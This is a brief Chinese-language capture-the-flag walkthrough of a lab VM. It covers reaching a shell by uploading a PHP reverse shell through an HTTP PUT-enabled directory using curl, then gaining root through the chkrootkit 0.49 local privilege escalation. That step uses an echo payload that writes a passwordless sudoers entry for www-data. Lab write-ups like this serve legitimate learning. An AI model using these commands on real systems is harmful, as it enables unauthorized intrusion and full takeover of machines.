# 靶场搭建
下载虚拟机,导入到虚拟机,网卡调成 NAT 模式直接就能用
IP: 192.168.174.130
# 渗透过程
# 信息初收集
22/tcp open ssh
80/tcp open http
明显是 web,扫了一下路径,发现 test 外没有任何东西了,而且这个文件夹里啥都没有
发现可以使用 PUT 上传文件
于是上传反弹 shell: curl --upload-file shell.php -v --url http://192.168.174.130/test/shell.php -0 --http1.0
目标机器可能设置了出口限制,反弹端口要设置为 443 才可以拿到 shell!
监听,拿到 shell。
# 提权
没有密码,低权限账号,目标机器一个 john 用户
find / -type f -perm /4000
没有发现有可以利用的脚本
查看定时任务,发现有一个 chkrootkit
,查看版本信息 dpkg -l | grep chkrootkit
有一个漏洞可以利用,Chkrootkit 0.49 - Local Privilege Escalation
具体漏洞信息:
https://www.exploit-db.com/exploits/33899
echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
这样等待一天后机器运行 chkrootkit,就有了 sudo 权限,而且不需要密码,直接 sudo su
就能拿到 root 权限了
# 小结
get 了新的提权方式。
提权方式还有很多种,需要进行总结。